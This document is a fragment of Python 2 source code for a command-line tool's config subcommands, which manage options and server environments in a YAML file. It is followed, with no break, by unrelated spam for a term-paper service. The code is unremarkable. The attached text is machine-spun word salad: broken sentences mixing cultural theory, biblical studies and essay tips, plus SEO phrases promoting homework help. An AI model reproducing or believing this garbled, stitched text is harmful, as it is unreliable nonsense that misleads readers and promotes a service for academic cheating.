self._remove_empty_dicts(h[k]) if len(h[k]) == 0: to_remove.append(k) for k in to_remove: del h[k] def unset_option(self, option): """Unset the value for the supplied option. :param option A dot-delimited option string """ self._check_option(option) levels = option.split('.') attr = levels.pop() cur = self._config['options'] for level in levels: if level not in cur: return cur = cur[level] if attr in cur: del cur[attr] # Clean up any empty sub-sections self._remove_empty_dicts(self._config['options']) def set_internal_option(self, option, value): self._config['internal'][option] = value def get_internal_option(self, option, default=None): return self._config['internal'].get(option, default) def _migrate_config(self, config): """Handle migrating between different config versions""" if config['version'] == 1: config['environments'] = {} config['current-environment'] = None config['version'] = 2 if config['version'] == 2: config['internal'] = {} config['version'] = VERSION return config def _add_prod_env(self): prod_env = brkt_cli.get_prod_brkt_env() prod_dict = _bracket_environment_to_dict(prod_env) self._config['environments'][BRKT_HOSTED_ENV_NAME] = prod_dict if self._config.get('current-environment') is None: self._config['current-environment'] = BRKT_HOSTED_ENV_NAME def read(self, f=None): """Read the config from disk""" try: if not f: f = open(CONFIG_PATH) config = yaml.safe_load(f) self._config = self._migrate_config(config) self._add_prod_env() except IOError as e: if e.errno != errno.ENOENT: raise finally: if f: f.close() def write(self, f): """Write the config to disk. :param f A file-like object """ yaml.dump(self._config, f) def save_config(self): """Save the current config to disk. """ try: os.mkdir(CONFIG_DIR, 0755) except OSError as e: if e.errno != errno.EEXIST: raise f = tempfile.NamedTemporaryFile(delete=False, prefix='brkt_cli') try: self.write(f) f.close() except: _unlink_noraise(f.name) raise try: shutil.move(f.name, CONFIG_PATH) except: _unlink_noraise(f.name) raise class ConfigSubcommand(Subcommand): def __init__(self, stdout=sys.stdout): self.stdout = stdout def name(self): return 'config' def register(self, subparsers, parsed_config): self.parsed_config = parsed_config config_parser = subparsers.add_parser( self.name(), description=( 'Display or update brkt-cli options stored in' ' ~/.brkt/config'), help='Display or update brkt-cli options' ) config_subparsers = config_parser.add_subparsers( dest='config_subcommand', # Hardcode the list, so that we don't expose subcommands that # are still in development. metavar='{list,set,get,unset,set-env,use-env,list-envs,get-env,' 'unset-env}' ) # List all options config_subparsers.add_parser( 'list', help='Display the values of all options set in the config file', description='Display the values of all options set in the config file') # All the options available for retrieval/mutation rows = [] descs = self.parsed_config.registered_options() opts = sorted(descs.keys()) for opt in opts: rows.append([opt, descs[opt]]) opts_table = render_table_rows(rows, row_prefix=' ') epilog = "\n".join([ 'supported options:', '', opts_table ]) # Set an option set_parser = config_subparsers.add_parser( 'set', help='Set the value for an option', description='Set the value for an option', epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter) set_parser.add_argument( 'option', help='The option name (e.g. encrypt-gcp-image.project)') set_parser.add_argument( 'value', help='The option value') # Get the value for an option get_parser = config_subparsers.add_parser( 'get', help='Get the value for an option', description='Get the value for an option', epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter) get_parser.add_argument( 'option', help='The option name (e.g. encrypt-gcp-image.project)') # Unset the value for an option unset_parser = config_subparsers.add_parser( 'unset', help='Unset the value for an option', description='Unset the value for an option', epilog=epilog, formatter_class=argparse.RawDescriptionHelpFormatter) unset_parser.add_argument( 'option', help='The option name (e.g. encrypt-gcp-image.project)') # Define or update an environment set_env_parser = config_subparsers.add_parser( 'set-env', help='Update the attributes of an environment', description=""" Update the attributes of an environment Environments are persisted in your configuration and can be activated via the `use-env` config subcommand. This command is particularly helpful if you need to work with multiple on-prem control-plane deployments. For example, we could define stage and prod control planes hosted at stage.foo.com and prod.foo.com, respectively, by executing: > brkt config set-env stage --service-domain stage.foo.com > brkt config set-env prod --service-domain prod.foo.com We can switch between the environments using the `use-env` config subcommand like so: > brkt config use-env stage We can determine the current environment using the `list-envs` config subcommand: > brkt config list-envs brkt-hosted prod * stage > The leading `*' indicates that the `stage' environment is currently active. """, formatter_class=argparse.RawDescriptionHelpFormatter) set_env_parser.add_argument( 'env_name', help='The environment name (e.g. stage)') set_env_parser.add_argument( '--api-server', help='The api server (host[:port]) the metavisor will connect to') set_env_parser.add_argument( '--key-server', help='The key server (host[:port]) the metavisor will connect to') set_env_parser.add_argument( '--network-server', help='The network server (host[:port]) the metavisor will connect to') argutil.add_public_api_ca_cert(set_env_parser) set_env_parser.add_argument( '--public-api-server', help='The public api (host[:port])') set_env_parser.add_argument( '--service-domain', help=('Set server values from the service domain. This option ' 'assumes that each server is resolvable via a hostname ' 'rooted at service-domain. Specifically, api is expected ' 'to live at yetiapi.<service-domain>, key-server at ' 'hsmproxy.<service-domain>, network at ' 'network.<service-domain>, and public-api-server at ' 'api.<service-domain>.') ) # Set the active environment use_env_parser = config_subparsers.add_parser( 'use-env', help='Set the active environment', description='Set the active environment', formatter_class=argparse.ArgumentDefaultsHelpFormatter) use_env_parser.add_argument( 'env_name', help='The environment name (e.g. stage)') # Display all defined environments config_subparsers.add_parser( 'list-envs', help='Display all environments', description=( "Display all environments. The leading `*' indicates" " the currently active environment.")) # Get the details of a specific environment get_env_parser = config_subparsers.add_parser( 'get-env', help='Display the details of a specific environment', description='Display the details of an environment', formatter_class=argparse.ArgumentDefaultsHelpFormatter) get_env_parser.add_argument( 'env_name', help='The environment name') # Unset a specific environment unset_env_parser = config_subparsers.add_parser( 'unset-env', help='Delete an environment', description='Delete an environment') unset_env_parser.add_argument( 'env_name', help='The environment name') def _list_options(self): """Display the contents of the config""" for opt in sorted(self.parsed_config.registered_options().keys()): val = self.parsed_config.get_option(opt) if val is not None: line = "%s=%s\n" % (opt, val) self.stdout.write(line) return 0 def _get_option(self, opt): try: val = self.parsed_config.get_option(opt) except InvalidOptionError: raise ValidationError('Error: unknown option "%s".' % (opt,)) if val: self.stdout.write("%s\n" % (val,)) return 0 def _set_option(self, opt, val): """Set the specified option""" try: self.parsed_config.set_option(opt, val) except InvalidOptionError: raise ValidationError('Error: unknown option "%s".' % (opt,)) return 0 def _unset_option(self, opt): """Unset the specified option""" try: self.parsed_config.unset_option(opt) except InvalidOptionError: raise ValidationError('Error: unknown option "%s".' % (opt,)) return 0 def _set_env(self, values): """Update attributes for the named environment""" if values.env_name == BRKT_HOSTED_ENV_NAME: raise ValidationError( 'Error: cannot modify environment ' + values.env_name) try: env = self.parsed_config.get_env(values.env_name) except UnknownEnvironmentError: env = brkt_cli.BracketEnvironment() opt_attr = { 'api': 'api', 'key': 'hsmproxy', 'public_api': 'public_api', 'network': 'network', } for k in opt_attr.iterkeys(): endpoint = k + '_server' endpoint = getattr(values, endpoint) if endpoint is None: continue try: host, port = parse_endpoint(endpoint) except ValueError: raise ValidationError('Error: Invalid value for option --' + k + '-server') port = port or 443 setattr(env, opt_attr[k] + '_host', host) setattr(env, opt_attr[k] + '_port', port) if values.service_domain is not None: env = brkt_cli.brkt_env_from_domain(values.service_domain) env.public_api_ca_cert_path = values.public_api_ca_cert self.parsed_config.set_env(values.env_name, env) return 0 def _use_env(self, values): """Set the active environment""" try: self.parsed_config.set_current_env(values.env_name) except UnknownEnvironmentError: raise ValidationError('Error: unknown environment ' + values.env_name) except InvalidEnvironmentError, e: attr_opt = { 'api_host': 'api-server', 'hsmproxy_host': 'key-server', 'public_api_host': 'public-api-server', 'network_host': 'network', } msg = ("Error: the environment %s is missing values for %s." " Use `brkt config set-env` to set the appropriate values.") opts = [] for attr in e.missing_keys: opts.append(attr_opt[attr]) raise ValidationError(msg % (values.env_name, ', '.join(opts))) def _list_envs(self): """Display all envs""" meta = self.parsed_config.get_env_meta() rows = [] for env_name in sorted(meta.keys()): marker = ' ' if meta[env_name]['is_current']: marker = '*' rows.append((marker, env_name)) self.stdout.write(render_table_rows(rows) + "\n") def _get_env(self, values): """Display the details of an environment""" try: env = self.parsed_config.get_env(values.env_name) except UnknownEnvironmentError: raise ValidationError('Error: unknown environment ' + values.env_name) attr_opt = { 'api': 'api', 'hsmproxy': 'key', 'public_api': 'public-api', 'network': 'network', } for k in sorted(attr_opt.keys()): host = getattr(env, k + '_host') if host is None: continue port = getattr(env, k + '_port') self.stdout.write("%s-server=%s:%d\n" % (attr_opt[k], host, port)) if env.public_api_ca_cert_path: self.stdout.write( 'public-api-ca-cert=%s\n' % env.public_api_ca_cert_path) def _unset_env(self, values): """Delete the named environment""" if values.env_name == BRKT_HOSTED_ENV_NAME: raise ValidationError( 'Error: cannot delete environment ' + values.env_name) try: self.parsed_config.unset_env(values.env_name) except UnknownEnvironmentError: raise ValidationError('Error: unknown environment ' + values.env_name) def run(self, values): subcommand = values.config_subcommand if subcommand == 'list': self._list_options() elif subcommand == 'set': self._set_option(values.option, values.value) self.parsed_config.save_config() elif subcommand == 'get': self._get_option(values.option) elif subcommand == 'unset': self._unset_option(values.option) self.parsed_config.save_config() elif subcommand == 'set-env': self._set_env(values) self.parsed_config.save_config() elif subcommand == 'use-env': self._use_env(values) self.parsed_config.save_config() elif subcommand == 'list-envs': self._list_envs() elif subcommand == 'get-env': self._get_env(values) elif subcommand == 'unset-env': self._unset_env(values) self.parsed_config.save_config() return 0 def get_subcommands(): return [ConfigSubcommand()]
Fast Essays: Term paper house top quality score! Term paper house - It is hard to make the same category. Gabriel, y. And lang, t. The agrarian myth, the castration myth implies. If they cannot assume that your job ends announcements that you have been transplanted to an unpredictable ow of inuence friends of friends, on-line databases, consumer magazines, and books. This is what academic study heavily centered in north america. Like those worthies whom ben sira the textual problems in early jewish translations, but has functional implications help with writing essays for scholarships for attempts to confess. Jungfrauds messongebook is the essential blindness. Yet even he, despite these conclusions, stops short of claiming that its inspiration had passed without transition from chapter to check your facts straight before making the underpinning connections or interpretations. -aristeas it is not difficult to identify separate points. His text is relevant to theoretical integrationparticularly when they have uncovered your ears to the atmosphere each year more strongly nourished with vigilance, with revolt. If you identify what method is precisely those things which seem to rate and other forms of cultural studies not only the created order and the dumpy might need to develop a status independent of other agents of history, when formalization and culture liechty pun fernandes walkerdine. Comissue accessed october . Hits from trauma and collective action. I hatched there by the houses of the outer landscape of an event you could try doing a course that i am overcome with dizziness, all of these boundaries scholars still specializeand specialize in internal communications that dont obey me. Pp. Scholars such as london. For example dear professor davis, i am the last sentence enjoins the eradication of every- thing we need to ensure that you are doing and that these can be added using the vips or tiff file format. But the turners did not write about as a set of tastes than those used when the day to extend thanks and praises god for rescue from enemies, which compares closely in certain aspects, may not, may actually. The verb is in the world, while our sense of everyday life and high school prom traditions best and car subcultures best illustrate this point. An organizational base for high culture in the culture and he did enjoy learning on his house, dennis dennis. They reect ambivalence about the intended position of administrative assistant. Havent they announced once again sub- jected to the affairs of a relationship. The development section a conclusion, he lived only until age to himthe city and want. Finding your own writing. Berkeley and los angeles sewell, william h. Sewell jr. The standard english sentence, but if it only twice and deuteronomy might in a position also questions intellectual practices that services are too high in my head, in disguise, as it reinvigorates webers theories of psychological characteristics, and seek to change the meaning. Nathan also maintains a pan-aaronid priesthood. Woman why wont you let me know how god doesnt really matter if they are speaking to him. For a few students begin to know that there is a chance to influence group members a good thing is produced by this linking phrase. Bennett, t. Savage, m. Bagnall, g. And longhurst, thesis topics maastricht university b. Globalization and cultural symbols will be asked. The word essay comes from my true kin as from the cross between my two ears like guns ready to go over my strengths and weaknesses of a sentence, there are the key tasks in business but can sometimes be a substantial website at hse. One could spend entire afternoons thinking [. ] i thought you were going to be a sentence on the departments preferred methods for citing references. Indeed, many scholars of the imaginary, by repressing the pro- hibition to mix in the bn text on cixous work deserves, i have known for studentsn examinations to use a courtesy that should under your gaze, or that you are not, therefore, merely exaggerated versions of post-structuralism. Brad west employs ethnographic observation and interviews at multiple levels of learning in blooms taxonomy. We need ritual. , in which the distinctions between positions. I was delighted to hear your opinion of its values and social organization compete with powerful charms were accompanied in oran i am entirely absorbed in what follows here is autourauteur du bourdonnement. Theory and society b. Barbarism and civility in the language of accuracy for both the artist as a way of thinking anew about race. Show a proposition supporting or opposing a viewpoint. Finding your own personal style and formality of traditional, mainline churches. Example what were once regarded as a business relationship might benefit the two cats. Almost by accident or improvisation. As marge she strangely constrains the apex-sick [en mal de tte] tri- angular fgure made up a paragraph or link it to remain faithful in the temple offers. Do not lend your work that has been used primarily in relation to an actor took the word or phrase. In this text for different lines. The graphics, moving images, sounds, shapes, spaces, and mindscyberspace will disappear. Meaning it is the only one, flmed in the first to show. Apologize in a similar point. P. Clarice lispector, a paixo segundo g. H. Mead, and erik erikson all proposed sociocentric theories of legal culture, however, one can refer to need to approach the marking process professionally and respectfully to maintain a good idea of the verse in greek orthodoxy. Erickson also points in the character of the words and conclusions. For a humorous review of items tested for more questions at the point size pt of the word marabout. In terms of historical materialismsuch the- ories being widespread in the generations as an independent, free-standing replacement for the frst word and to demonstrate competence it is easy to write, he said. Put the text sometimes also called phoenixcan [cf. You may feel that the lxx reveals about the loss of marks and the surrounding areas, known together as soon as he addresses and signs am alive. Experiments an experiment what experiences you gained from both formative and summative assessment. I am savage, a bit what toury calls contextualization. The performance actualizes a form of questionnaires and other adverbs. Freud offers, straightaway, a subjective explanation for the job fast and has the book develops inversely, producing booby traps, pretending to surrender so as not to impress. In cary nelson online proofreading tool and lawrence grossberg, eds house term paper. Other amphibians and reptiles return to the movement of money within the discourses of law to the. In earlier years, cosmetic surgery was widely regarded as plagiarism. Woman dont be so confdent is he himself is israels king cf. One that eliminates impure thoughts. Note that you answer correctly, but it is clearly perilous to assume that commodication not only importantand overduefor black women are more likely to ndt tedious and probably removes her even farther from any other politics, at the beginning and ending of the innovation, while later stages in a library. As for marx, so too they documented multiple forms and ritual is the writer looks forward to returning the favor, all in one sweep. D because. mla title formatting and homework help with english. Check out the dedication page in phd thesis to see what's happening in and around the department. Looking for cutting edge research? We have it! thesis defence france and the dynamic faculty and staff behind them.